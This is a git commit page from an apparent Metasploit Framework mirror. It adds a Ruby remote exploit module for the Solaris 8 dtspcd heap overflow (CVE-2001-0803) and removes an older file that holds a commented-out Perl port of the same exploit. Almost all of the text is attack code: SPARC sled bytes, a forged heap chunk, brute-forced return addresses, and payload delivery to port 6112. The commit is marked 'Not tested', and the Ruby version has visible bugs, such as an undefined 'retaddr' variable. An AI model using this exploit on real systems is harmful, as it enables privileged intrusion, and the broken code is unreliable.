infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Moved. Changed. Woop. Not tested 

git-svn-id: file:///home/svn/incoming/trunk@3261 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2005-12-27 05:47:03 +00:00
parent 7e14163849
commit 87f23247a5
2 changed files with 140 additions and 265 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

140
modules/exploits/solaris/dtspcd/heap_noir.rb Normal file
View File

@ -0,0 +1,140 @@
require 'msf/core'
module Msf
class Exploits::Solaris::Dtspcd::Heap_Noir < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris dtspcd Heap Overflow',
'Description' => %q{
This is a port of noir's dtspcd exploit. This module should
work against any vulnerable version of Solaris 8 (sparc).
The original exploit code was published in the book
Shellcoder's Handbook.
},
'Author' => [ 'noir <noir@uberhax0r.net>', 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '4503'],
[ 'CVE', '2001-0803'],
[ 'URL', 'http://www.cert.org/advisories/CA-2001-31.html'],
[ 'URL', 'http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'],
[ 'MIL', '61'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x0d",
'PrependEncoder' => ("\xa4\x1c\x40\x11" * 3),
},
'Platform' => 'solaris',
'Arch' => ARCH_SPARC,
'Targets' =>
[
['Solaris 8',
{ 'Rets' =>
[0xff3b0000, 0x2c000, 0x2f000, 0x400, [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ] ]
}
],
],
'DisclosureDate' => 'Jul 10 2002',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(6112)
], self.class)
end
def exploit
return if not dtspcd_uname()
target['Rets'][4].each do |tjmp|
rbase = target['Rets'][1]
while (rbase < target['Rets'][2]) do
print_status("Trying 0x%.8x 0x%.8x" % target['Rets'][0] + tjmp, rbase)
attack(target['Rets'][0] + tjmp, rbase, payload.encoded)
attack(target['Rets'][0] + tjmp, rbase + 4, payload.encoded)
rbase += target['Rets'][3]
end
end
handler
disconnect
end
def check
return Exploit::CheckCode::Detected if dtspcd_uname()
return Exploit::CheckCode::Safe
end
def dtspcd_uname
spc_connect()
spc_write(spc_register('root', "\x00"), 4)
host, os, ver, arch = spc_read().gsub("\x00", '').split(':')
return false if not host
print_status("Detected dtspcd running #{os} v#{ver} on #{arch} hardware")
spc_write("", 2)
return true
end
def chunk_create(retloc, retadd)
"\x12\x12\x12\x12" +
[retaddr].pack('N')+
"\x23\x23\x23\x23\xff\xff\xff\xff" +
"\x34\x34\x34\x34\x45\x45\x45\x45" +
"\x56\x56\x56\x56" +
[retloc - 8].pack('N')
end
def attack(retloc, retadd, fcode)
spc_connect()
buf = ("\xa4\x1c\x40\x11\x20\xbf\xff\xff" * ((4096 - 8 - fcode.length) / 8)) + fcode
buf << "\x00\x00\x10\x3e\x00\x00\x00\x14"
buf << "\x12\x12\x12\x12\xff\xff\xff\xff"
buf << "\x00\x00\x0f\xf4"
buf << chunk_create(retloc, retadd)
buf << "X" * ((0x103e - 8) - buf.length)
spc_write(spc_register("", buf), 4)
sock.get_once(-1)
end
def spc_register(user='', buff='')
"4 \x00#{user}\x00\x0010\x00#{buff}"
end
def spc_write(buff = '', cmd='')
sock.put(sprintf("%08x%02x%04x%04x %s", 2, cmd, buff.length, (@spc_seq += 1), buff))
end
def spc_read
# Bytes: 0-9 = channel, 9-10 = cmd, 10-13 = mbl, 14-17 = seq
head = sock.get_once(20)
sock.get_once( head[10, 13].hex ) || ''
end
def spc_connect
disconnect
connect
@spc_seq = 0
end
end
end

265
modules/exploits/solaris/dtspcd/solaris_dtspcd_noir.rb
View File

@ -1,265 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris dtspcd Heap Overflow',
'Description' => %q{
This is a port of noir's dtspcd exploit. This module should
work against any vulnerable version of Solaris 8 (sparc).
The original exploit code was published in the book
Shellcoder's Handbook.
},
'Author' => [ 'noir <noir@uberhax0r.net>', 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '4503'],
[ 'CVE', '2001-0803'],
[ 'URL', 'http://www.cert.org/advisories/CA-2001-31.html'],
[ 'URL', 'http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'],
[ 'MIL', '61'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x0d",
'PrependEncoder' => "\xa4\x1c\x40\x11\xa4\x1c\x40\x11\xa4\x1c\x40\x11",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'solaris',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => 'Jul 10 2002',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::solaris_dtspcd_noir;
use base "Msf::Exploit";
use IO::Socket;
use IO::Select;
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Solaris dtspcd Heap Overflow',
'Version' => '$Revision$',
'Authors' =>
[
'noir <noir [at] uberhax0r.net>',
'H D Moore <hdm [at] metasploit.com>'
],
'Arch' => [ 'sparc' ],
'OS' => [ 'solaris' ],
'Priv' => 1,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The dtogin service port', 6112],
},
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x0d",
'PrependEncoder' => (pack('N', 0xa41c4011) x 3),
},
'Description' => Pex::Text::Freeform(qq{
This is a port of noir's dtspcd exploit. This module should work against
any vulnerable version of Solaris 8 (sparc). The original exploit code
was published in the book Shellcoder's Handbook.
}),
'Refs' =>
[
['OSVDB', '4503'],
['CVE', '2001-0803'],
['URL', 'http://www.cert.org/advisories/CA-2001-31.html'],
['URL', 'http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'],
['MIL', '61'],
],
'Targets' =>
[
['Solaris8', 0xff3b0000, 0x2c000, 0x2f000, 0x400, [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ] ],
],
'Keys' => ['dtspcd'],
'DisclosureDate' => 'Jul 10 2002',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
if(! $self->get_uname) {
$self->PrintLine("[*] No response from the dtlogin service");
return $self->CheckCode('Safe');
}
# XXX - probe service for crash
return $self->CheckCode('Detected');
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target_idx = $self->GetVar('TARGET');
my $target = $self->Targets->[ $target_idx ];
if(! $self->get_uname) {
$self->PrintLine("[*] No response from the dtlogin service");
return;
}
my ($res, $req);
for my $tjmp ( @{ $target->[5] } ) {
for (my $rbase = $target->[2]; $rbase < $target->[3]; $rbase += $target->[4] ) {
$self->PrintLine("[*] Trying ".sprintf("0x%.8x 0x%.8x", $target->[1] + $tjmp, $rbase));
return if ! $self->attack($target->[1] + $tjmp, $rbase, $shellcode);
return if ! $self->attack($target->[1] + $tjmp, $rbase + 4, $shellcode);
}
}
}
sub spc_setup {
my $self = shift;
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $self->GetVar('RHOST'),
'PeerPort' => $self->GetVar('RPORT'),
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$self->{'SOC'} = $s;
return $s;
}
sub spc_register {
my ($self, $user, $buff) = @_;
return "4 "."\x00".$user."\x00\x00"."10"."\x00".$buff;
}
sub spc_write {
my ($self, $buff, $cmd) = @_;
my $req = sprintf("%08x%02x%04x%04x %s", 2, $cmd, length($buff), ++$self->{'SEQ'}, $buff);
return if ! $self->{'SOC'};
return $self->{'SOC'}->Send($req);
}
sub spc_read {
my $self = shift;
return if ! $self->{'SOC'};
my $buff = $self->{'SOC'}->Recv(20, 5);
my $chan = hex(substr($buff, 0, 9));
my $cmd = hex(substr($buff, 9, 1));
my $mbl = hex(substr($buff, 10, 4));
my $seq = hex(substr($buff, 14, 4));
$buff = $self->{'SOC'}->Recv($mbl, 5);
return $buff;
}
sub get_uname {
my $self = shift;
return if ! $self->spc_setup;
$self->spc_write($self->spc_register('root', "\x00"), 4);
my $buff = $self->spc_read;
$buff =~ s/\x00//g;
my ($host, $os, $ver, $arch) = split(/:/, $buff);
return if ! $host;
$self->PrintLine("[*] Detected dtspcd running $os v$ver on $arch hardware");
$self->spc_write("", 2);
}
sub get_chunk {
my ($self, $retloc, $retadd) = @_;
return
"\x12\x12\x12\x12" . pack('N', $retadd).
"\x23\x23\x23\x23\xff\xff\xff\xff".
"\x34\x34\x34\x34\x45\x45\x45\x45".
"\x56\x56\x56\x56" . pack('N', $retloc - 8);
}
sub attack {
my ($self, $retloc, $retadd, $fcode) = @_;
return if ! $self->spc_setup;
my $req = "\xa4\x1c\x40\x11\x20\xbf\xff\xff" x ((4096 - 8 - length($fcode)) / 8);
$req .= $fcode .
"\x00\x00\x10\x3e\x00\x00\x00\x14".
"\x12\x12\x12\x12\xff\xff\xff\xff".
"\x00\x00\x0f\xf4".
$self->get_chunk($retloc, $retadd);
$req .= "A" x ((0x103e - 8) - length($req));
$self->spc_write($self->spc_register("", $req), 4);
my $res = $self->{'SOC'}->Recv(-1, 5);
return 1;
}
1;
=end
end
end